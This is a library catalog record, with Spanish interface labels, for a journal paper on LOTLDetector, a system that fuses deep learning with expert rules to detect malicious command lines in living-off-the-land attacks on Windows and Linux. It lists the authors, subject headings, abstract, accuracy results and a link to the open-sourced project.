Imagen de Portada

Lotldetector: living off the land attacks detection system based on feature fusion

Guardado en:
Publicado en:Cybersecurity vol. 9, no. 1 (Dec 2026), p. 4
Autor principal: Zhu, Tiantian
Otros Autores: Zheng, Jie, Chen, Tieming, Lv, Mingqi, Xiong, Chunlin, Weng, Zhengqiu, Zheng, Xiangyang
Publicado:
Springer Nature B.V.
Materias:
Datasets
Semantics
Malware
Natural language processing
Deep learning
Algorithms
Neural networks
Linux
Tags
Network computers
Acceso en línea:Citation/Abstract
Full Text
Full Text - PDF
Etiquetas: Agregar Etiqueta
Sin Etiquetas, Sea el primero en etiquetar este registro!
Resumen:In recent years, Living off the Land (LotL) attacks have been drawing attention due to their flexibility and difficulty in detection. These attacks exploit legitimate tools already in the system to conduct malicious activities, hiding their malicious intent behind normal benign programs. However, detection methods for such attacks largely rely on expert rules. While rule tags can effectively detect known attacks, this also leads to a high false positive rate, resulting in low detection accuracy for the models. To address these issues, we propose a detection system called LOTLDetector, which combines deep learning methods with expert rules to detect malicious command lines in LotL attacks from both data and knowledge perspectives. LOTLDetector learns the semantics of command line text through neural networks and combines rule tags from expert knowledge, enabling a more comprehensive detection of LotL attacks. We extensively evaluated our method, validated it on a Windows dataset containing 27,448 command lines and a Linux dataset containing 27,093 command lines, and compared it with existing methods. The results show that our method significantly outperforms existing methods in detecting malicious command lines. For the Linux dataset, the detection system achieved a detection performance with an accuracy of 0.9728; for the Windows dataset, the system’s detection accuracy also reached 0.9598, which is about 8% higher than the best existing method. In addition, our project has been open-sourced at <ext-link xlink:href="https://github.com/csedikaf/LOTLDetector" ext-link-type="uri">https://github.com/csedikaf/LOTLDetector</ext-link>.
ISSN:2523-3246
DOI:10.1186/s42400-025-00531-w
Fuente:Publicly Available Content Database